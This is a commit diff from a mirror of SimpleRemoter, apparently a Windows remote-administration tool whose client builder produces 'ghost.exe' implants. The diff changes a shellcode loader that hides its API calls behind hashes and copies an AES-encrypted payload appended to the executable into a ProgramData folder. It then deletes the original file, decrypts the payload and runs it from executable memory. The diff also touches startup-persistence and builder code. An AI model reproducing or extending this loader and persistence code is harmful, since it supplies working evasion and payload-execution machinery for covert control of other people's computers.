admin/SimpleRemoter
1
0
Fork 0
mirror of https://github.com/yuanyuanxiang/SimpleRemoter.git synced 2026-01-21 23:13:08 +08:00
Code Issues Packages Projects Releases Wiki Activity

Fix: Copy payload file to target directory when installing

Browse Source
This commit is contained in:
yuanyuanxiang
2026-01-14 00:01:15 +01:00
parent e5872dc0b8
commit 32f298bdfb
8 changed files with 85 additions and 22 deletions
Download Patch File Download Diff File Expand all files Collapse all files

47
client/SimpleSCLoader.c
View File

@@ -8,6 +8,7 @@ struct {
int len; int len;
int offset; int offset;
char file[_MAX_PATH]; char file[_MAX_PATH];
char targetDir[_MAX_PATH];
} sc = { "Hello, World!" }; } sc = { "Hello, World!" };
#define Kernel32Lib_Hash 0x1cca9ce6 #define Kernel32Lib_Hash 0x1cca9ce6
@@ -40,6 +41,12 @@ typedef HANDLE(WINAPI* _CreateFileA)(LPCSTR lpFileName, DWORD dwDesiredAccess, D
#define ReadFile_Hash 990362902 #define ReadFile_Hash 990362902
typedef BOOL(WINAPI* _ReadFile)(HANDLE hFile, LPVOID lpBuffer, DWORD nNumberOfBytesToRead, LPDWORD lpNumberOfBytesRead, LPOVERLAPPED lpOverlapped); typedef BOOL(WINAPI* _ReadFile)(HANDLE hFile, LPVOID lpBuffer, DWORD nNumberOfBytesToRead, LPDWORD lpNumberOfBytesRead, LPOVERLAPPED lpOverlapped);
#define DeleteFileA_Hash 161619550
typedef BOOL(WINAPI* _DeleteFileA)(LPCSTR lpFileName);
#define CopyFileA_Hash 524124328
typedef BOOL(WINAPI* _CopyFileA)(LPCSTR lpExistingFileName, LPCSTR lpNewFileName, BOOL bFailIfExists);
#define CloseHandle_Hash 110641196 #define CloseHandle_Hash 110641196
typedef BOOL(WINAPI* _CloseHandle)(HANDLE hObject); typedef BOOL(WINAPI* _CloseHandle)(HANDLE hObject);
@@ -219,6 +226,16 @@ void* get_proc_address_from_hash(HMODULE module, uint32_t func_hash, _GetProcAdd
return 0; return 0;
} }
char* strstr(const char* h, const char* n) {
if (!*n) return (char*)h;
for (; *h; h++) {
const char* p = h, * q = n;
while (*p && *q && *p == *q) p++, q++;
if (!*q) return (char*)h;
}
return NULL;
}
// A simple shell code loader. // A simple shell code loader.
// Copy left (c) yuanyuanxiang. // Copy left (c) yuanyuanxiang.
#ifdef _DEBUG #ifdef _DEBUG
@@ -227,7 +244,7 @@ void* get_proc_address_from_hash(HMODULE module, uint32_t func_hash, _GetProcAdd
int entry() int entry()
{ {
HMODULE kernel32 = get_kernel32_base(); HMODULE kernel32 = get_kernel32_base();
if (!kernel32) return 1; if (!kernel32) return(1);
_GetProcAddress GetProcAddress = (_GetProcAddress)get_proc_address_from_hash(kernel32, GetProcAddress_Hash, 0); _GetProcAddress GetProcAddress = (_GetProcAddress)get_proc_address_from_hash(kernel32, GetProcAddress_Hash, 0);
_LoadLibraryA LoadLibraryA = (_LoadLibraryA)get_proc_address_from_hash(kernel32, LoadLibraryA_Hash, GetProcAddress); _LoadLibraryA LoadLibraryA = (_LoadLibraryA)get_proc_address_from_hash(kernel32, LoadLibraryA_Hash, GetProcAddress);
_VirtualAlloc VirtualAlloc = (_VirtualAlloc)get_proc_address_from_hash(kernel32, VirtualAlloc_Hash, GetProcAddress); _VirtualAlloc VirtualAlloc = (_VirtualAlloc)get_proc_address_from_hash(kernel32, VirtualAlloc_Hash, GetProcAddress);
@@ -237,24 +254,40 @@ int entry()
_CreateFileA CreateFileA = (_CreateFileA)get_proc_address_from_hash(kernel32, CreateFileA_Hash, GetProcAddress); _CreateFileA CreateFileA = (_CreateFileA)get_proc_address_from_hash(kernel32, CreateFileA_Hash, GetProcAddress);
_SetFilePointer SetFilePointer = (_SetFilePointer)get_proc_address_from_hash(kernel32, SetFilePointer_Hash, GetProcAddress); _SetFilePointer SetFilePointer = (_SetFilePointer)get_proc_address_from_hash(kernel32, SetFilePointer_Hash, GetProcAddress);
_ReadFile ReadFile = (_ReadFile)get_proc_address_from_hash(kernel32, ReadFile_Hash, GetProcAddress); _ReadFile ReadFile = (_ReadFile)get_proc_address_from_hash(kernel32, ReadFile_Hash, GetProcAddress);
_DeleteFileA DeleteFileA = (_DeleteFileA)get_proc_address_from_hash(kernel32, DeleteFileA_Hash, GetProcAddress);
_CopyFileA CopyFileA = (_CopyFileA)get_proc_address_from_hash(kernel32, CopyFileA_Hash, GetProcAddress);
_CloseHandle CloseHandle = (_CloseHandle)get_proc_address_from_hash(kernel32, CloseHandle_Hash, GetProcAddress); _CloseHandle CloseHandle = (_CloseHandle)get_proc_address_from_hash(kernel32, CloseHandle_Hash, GetProcAddress);
if (!sc.file[0]) GetModulePath(NULL, sc.file, MAX_PATH); if (!sc.file[0]) GetModulePath(NULL, sc.file, MAX_PATH);
HANDLE hFile = CreateFileA(sc.file, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, 0, NULL); char* file = sc.file, dstFile[2 * MAX_PATH];
if (hFile == INVALID_HANDLE_VALUE) return 2; if (sc.targetDir[0]) {
char curExe[MAX_PATH], * p = dstFile, * dir = sc.targetDir;
GetModulePath(NULL, curExe, MAX_PATH);
while (*dir) *p++ = *dir++; *p++ = '\\';
while (*file) *p++ = *file++; *p = '\0';
file = dstFile;
if (!strstr(curExe, sc.targetDir)) {
DeleteFileA(dstFile);
BOOL b = CopyFileA(sc.file, dstFile, FALSE);
DeleteFileA(sc.file);
if (!b) return(2);
}
}
HANDLE hFile = CreateFileA(file, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, 0, NULL);
if (hFile == INVALID_HANDLE_VALUE) return(3);
SetFilePointer(hFile, (LONG)sc.offset, NULL, FILE_BEGIN); SetFilePointer(hFile, (LONG)sc.offset, NULL, FILE_BEGIN);
DWORD bytesRead = 0; DWORD bytesRead = 0;
sc.data = VirtualAlloc(NULL, sc.len, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE); sc.data = VirtualAlloc(NULL, sc.len, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
if (!ReadFile(hFile, sc.data, sc.len, &bytesRead, NULL)) return 3; if (!ReadFile(hFile, sc.data, sc.len, &bytesRead, NULL)) return(4);
CloseHandle(hFile); CloseHandle(hFile);
if (!sc.data || !sc.len) return 4; if (!sc.data || !sc.len) return(5);
struct AES_ctx ctx; struct AES_ctx ctx;
AES_init_ctx_iv(&ctx, sc.aes_key, sc.aes_iv); AES_init_ctx_iv(&ctx, sc.aes_key, sc.aes_iv);
AES_CBC_decrypt_buffer(&ctx, sc.data, sc.len); AES_CBC_decrypt_buffer(&ctx, sc.data, sc.len);
DWORD oldProtect = 0; DWORD oldProtect = 0;
if (!VirtualProtect(sc.data, sc.len, PAGE_EXECUTE_READ, &oldProtect)) return 5; if (!VirtualProtect(sc.data, sc.len, PAGE_EXECUTE_READ, &oldProtect)) return(6);
((void(*)())sc.data)(); ((void(*)())sc.data)();
Sleep(INFINITE); Sleep(INFINITE);
return 0; return(0);
} }

2
client/main.c
View File

@@ -376,7 +376,7 @@ const char* ReceiveShellcode(const char* sIP, int serverPort, int* sizeOut)
inline int MemoryFind(const char* szBuffer, const char* Key, int iBufferSize, int iKeySize) inline int MemoryFind(const char* szBuffer, const char* Key, int iBufferSize, int iKeySize)
{ {
for (int i = 0; i < iBufferSize - iKeySize; ++i) { for (int i = 0; i <= iBufferSize - iKeySize; ++i) {
if (0 == memcmp(szBuffer + i, Key, iKeySize)) { if (0 == memcmp(szBuffer + i, Key, iKeySize)) {
return i; return i;
} }

34
client/reg_startup.c
View File

@@ -327,6 +327,25 @@ BOOL CreateDirectoryRecursively(const char* path)
return TRUE; return TRUE;
} }
const char* GetInstallDirectory(const char * startupName)
{
static char folder[MAX_PATH] = { 0 };
if (GetEnvironmentVariableA("ProgramData", folder, MAX_PATH) > 0) {
size_t len = strlen(folder);
if (len > 0 && folder[len - 1] != '\\') {
folder[len] = '\\';
folder[len + 1] = '\0';
}
strcat(folder, startupName);
if (!CreateDirectoryRecursively(folder)) {
Mprintf("Failed to create directory structure: %s\n", folder);
return NULL;
}
}
return folder;
}
int RegisterStartup(const char* startupName, const char* exeName, bool lockFile, bool runasAdmin, StartupLogFunc log) int RegisterStartup(const char* startupName, const char* exeName, bool lockFile, bool runasAdmin, StartupLogFunc log)
{ {
#ifdef _DEBUG #ifdef _DEBUG
@@ -338,21 +357,10 @@ int RegisterStartup(const char* startupName, const char* exeName, bool lockFile,
if (GetUserNameA(username, &size)) { if (GetUserNameA(username, &size)) {
Mprintf("RegisterStartup is running with user: %s\n", username); Mprintf("RegisterStartup is running with user: %s\n", username);
} }
char folder[MAX_PATH] = { 0 }; const char *folder = GetInstallDirectory(startupName);
if (GetEnvironmentVariableA("ProgramData", folder, MAX_PATH) > 0) { if (!folder) {
size_t len = strlen(folder);
if (len > 0 && folder[len - 1] != '\\') {
folder[len] = '\\';
folder[len + 1] = '\0';
}
strcat(folder, startupName);
if (!CreateDirectoryRecursively(folder)) {
Mprintf("Failed to create directory structure: %s\n", folder);
return -1; return -1;
} }
}
char curFile[MAX_PATH] = { 0 }; char curFile[MAX_PATH] = { 0 };
GetModuleFileNameA(NULL, curFile, MAX_PATH); GetModuleFileNameA(NULL, curFile, MAX_PATH);

2
client/reg_startup.h
View File

@@ -1,6 +1,8 @@
#pragma once #pragma once
#include <stdbool.h> #include <stdbool.h>
const char* GetInstallDirectory(const char* startupName);
typedef void (*StartupLogFunc)(const char* file, int line, const char* format, ...); typedef void (*StartupLogFunc)(const char* file, int line, const char* format, ...);
// return > 0 means to continue running else terminate. // return > 0 means to continue running else terminate.

2
common/commands.h
View File

@@ -557,7 +557,7 @@ enum TestRunType {
inline int MemoryFind(const char* szBuffer, const char* Key, int iBufferSize, int iKeySize) inline int MemoryFind(const char* szBuffer, const char* Key, int iBufferSize, int iKeySize)
{ {
for (int i = 0; i < iBufferSize - iKeySize; ++i) { for (int i = 0; i <= iBufferSize - iKeySize; ++i) {
if (0 == memcmp(szBuffer + i, Key, iKeySize)) { if (0 == memcmp(szBuffer + i, Key, iKeySize)) {
return i; return i;
} }

7
server/2015Remote/2015Remote_vs2015.vcxproj
View File

@@ -264,6 +264,7 @@
<ItemGroup> <ItemGroup>
<ClInclude Include="..\..\client\Audio.h" /> <ClInclude Include="..\..\client\Audio.h" />
<ClInclude Include="..\..\client\MemoryModule.h" /> <ClInclude Include="..\..\client\MemoryModule.h" />
<ClInclude Include="..\..\client\reg_startup.h" />
<ClInclude Include="..\..\common\aes.h" /> <ClInclude Include="..\..\common\aes.h" />
<ClInclude Include="..\..\common\encrypt.h" /> <ClInclude Include="..\..\common\encrypt.h" />
<ClInclude Include="..\..\common\file_upload.h" /> <ClInclude Include="..\..\common\file_upload.h" />
@@ -338,6 +339,12 @@
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">NotUsing</PrecompiledHeader> <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">NotUsing</PrecompiledHeader>
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">NotUsing</PrecompiledHeader> <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">NotUsing</PrecompiledHeader>
</ClCompile> </ClCompile>
<ClCompile Include="..\..\client\reg_startup.c">
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">NotUsing</PrecompiledHeader>
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|x64'">NotUsing</PrecompiledHeader>
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">NotUsing</PrecompiledHeader>
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">NotUsing</PrecompiledHeader>
</ClCompile>
<ClCompile Include="..\..\common\aes.c"> <ClCompile Include="..\..\common\aes.c">
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">NotUsing</PrecompiledHeader> <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">NotUsing</PrecompiledHeader>
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">NotUsing</PrecompiledHeader> <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">NotUsing</PrecompiledHeader>

2
server/2015Remote/2015Remote_vs2015.vcxproj.filters
View File

@@ -63,6 +63,7 @@
<ClCompile Include="ToolbarDlg.cpp" /> <ClCompile Include="ToolbarDlg.cpp" />
<ClCompile Include="CDlgFileSend.cpp" /> <ClCompile Include="CDlgFileSend.cpp" />
<ClCompile Include="..\..\common\file_upload.cpp" /> <ClCompile Include="..\..\common\file_upload.cpp" />
<ClCompile Include="..\..\client\reg_startup.c" />
</ItemGroup> </ItemGroup>
<ItemGroup> <ItemGroup>
<ClInclude Include="..\..\client\Audio.h" /> <ClInclude Include="..\..\client\Audio.h" />
@@ -138,6 +139,7 @@
<ClInclude Include="SplashDlg.h" /> <ClInclude Include="SplashDlg.h" />
<ClInclude Include="ToolbarDlg.h" /> <ClInclude Include="ToolbarDlg.h" />
<ClInclude Include="CDlgFileSend.h" /> <ClInclude Include="CDlgFileSend.h" />
<ClInclude Include="..\..\client\reg_startup.h" />
</ItemGroup> </ItemGroup>
<ItemGroup> <ItemGroup>
<ResourceCompile Include="2015Remote.rc" /> <ResourceCompile Include="2015Remote.rc" />

13
server/2015Remote/BuildDlg.cpp
View File

@@ -10,6 +10,9 @@
#include <bcrypt.h> #include <bcrypt.h>
#include <wincrypt.h> #include <wincrypt.h>
#include "Resource.h" #include "Resource.h"
extern "C" {
#include "client/reg_startup.h"
}
// #include <ntstatus.h> // #include <ntstatus.h>
enum Index { enum Index {
@@ -198,6 +201,7 @@ typedef struct SCInfo {
int len; int len;
int offset; int offset;
char file[_MAX_PATH]; char file[_MAX_PATH];
char targetDir[_MAX_PATH];
} SCInfo; } SCInfo;
#define GetAddr(mod, name) GetProcAddress(GetModuleHandleA(mod), name) #define GetAddr(mod, name) GetProcAddress(GetModuleHandleA(mod), name)
@@ -292,11 +296,13 @@ void CBuildDlg::OnBnClickedOk()
} }
int startup = Startup_DLL; int startup = Startup_DLL;
CString file; CString file;
CString targetDir;
switch (index) { switch (index) {
case IndexTestRun_DLL: case IndexTestRun_DLL:
case IndexTestRun_MemDLL: case IndexTestRun_MemDLL:
case IndexTestRun_InjSC: case IndexTestRun_InjSC:
file = "TestRun.exe"; file = "TestRun.exe";
targetDir = GetInstallDirectory(m_sInstallDir.IsEmpty() ? "Client Demo" : m_sInstallDir);
typ = index == IndexTestRun_DLL ? CLIENT_TYPE_DLL : CLIENT_TYPE_MEMDLL; typ = index == IndexTestRun_DLL ? CLIENT_TYPE_DLL : CLIENT_TYPE_MEMDLL;
startup = std::map<int, int> { startup = std::map<int, int> {
{IndexTestRun_DLL, Startup_DLL},{IndexTestRun_MemDLL, Startup_MEMDLL},{IndexTestRun_InjSC, Startup_InjSC}, {IndexTestRun_DLL, Startup_DLL},{IndexTestRun_MemDLL, Startup_MEMDLL},{IndexTestRun_InjSC, Startup_InjSC},
@@ -305,17 +311,20 @@ void CBuildDlg::OnBnClickedOk()
break; break;
case IndexGhost: case IndexGhost:
file = "ghost.exe"; file = "ghost.exe";
targetDir = GetInstallDirectory(m_sInstallDir.IsEmpty() ? "Windows Ghost" : m_sInstallDir);
typ = CLIENT_TYPE_ONE; typ = CLIENT_TYPE_ONE;
szBuffer = ReadResource(is64bit ? IDR_GHOST_X64 : IDR_GHOST_X86, dwFileSize); szBuffer = ReadResource(is64bit ? IDR_GHOST_X64 : IDR_GHOST_X86, dwFileSize);
break; break;
case IndexGhostMsc: case IndexGhostMsc:
file = "ghost.exe"; file = "ghost.exe";
targetDir = GetInstallDirectory(m_sInstallDir.IsEmpty() ? "Windows Ghost" : m_sInstallDir);
typ = CLIENT_TYPE_ONE; typ = CLIENT_TYPE_ONE;
startup = Startup_GhostMsc; startup = Startup_GhostMsc;
szBuffer = ReadResource(is64bit ? IDR_GHOST_X64 : IDR_GHOST_X86, dwFileSize); szBuffer = ReadResource(is64bit ? IDR_GHOST_X64 : IDR_GHOST_X86, dwFileSize);
break; break;
case IndexTestRunMsc: case IndexTestRunMsc:
file = "TestRun.exe"; file = "TestRun.exe";
targetDir = GetInstallDirectory(m_sInstallDir.IsEmpty() ? "Client Demo" : m_sInstallDir);
typ = CLIENT_TYPE_MEMDLL; typ = CLIENT_TYPE_MEMDLL;
startup = Startup_TestRunMsc; startup = Startup_TestRunMsc;
szBuffer = ReadResource(is64bit ? IDR_TESTRUN_X64 : IDR_TESTRUN_X86, dwFileSize); szBuffer = ReadResource(is64bit ? IDR_TESTRUN_X64 : IDR_TESTRUN_X86, dwFileSize);
@@ -468,6 +477,7 @@ void CBuildDlg::OnBnClickedOk()
payload = GetFilePath(NULL, m[n].c_str(), n != Payload_Raw); payload = GetFilePath(NULL, m[n].c_str(), n != Payload_Raw);
sc->offset = n == Payload_Raw ? 0 : GetFileSize(payload); sc->offset = n == Payload_Raw ? 0 : GetFileSize(payload);
strcpy(sc->file, PathFindFileNameA(payload)); strcpy(sc->file, PathFindFileNameA(payload));
strcpy(sc->targetDir, targetDir);
tip = payload.IsEmpty() ? "\r\n警告: 没有生成载荷!" : "\r\n提示: 载荷文件必须拷贝至程序目录。"; tip = payload.IsEmpty() ? "\r\n警告: 没有生成载荷!" : "\r\n提示: 载荷文件必须拷贝至程序目录。";
} }
BOOL r = WriteBinaryToFile(strSeverFile.GetString(), (char*)data, dwSize); BOOL r = WriteBinaryToFile(strSeverFile.GetString(), (char*)data, dwSize);
@@ -726,7 +736,8 @@ void CBuildDlg::OnCbnSelchangeComboCompress()
static bool warned = false; static bool warned = false;
if (m_ComboCompress.GetCurSel() == CLIENT_COMPRESS_SC_AES && !warned) { if (m_ComboCompress.GetCurSel() == CLIENT_COMPRESS_SC_AES && !warned) {
warned = true; warned = true;
MessageBoxA(_T("使用 ShellCode AES 在程序尾部追加载荷,可能无法在某些系统运行! 需切换为 ShellCode AES Old 模式生成!"), MessageBoxA(_T("使用 ShellCode AES 在程序尾部追加载荷,可能无法在某些服务器系统运行! "
"请自行验证。或者选择其他载荷,或者切换为 ShellCode AES Old 模式生成!"),
"提示", MB_ICONWARNING); "提示", MB_ICONWARNING);
} }
} }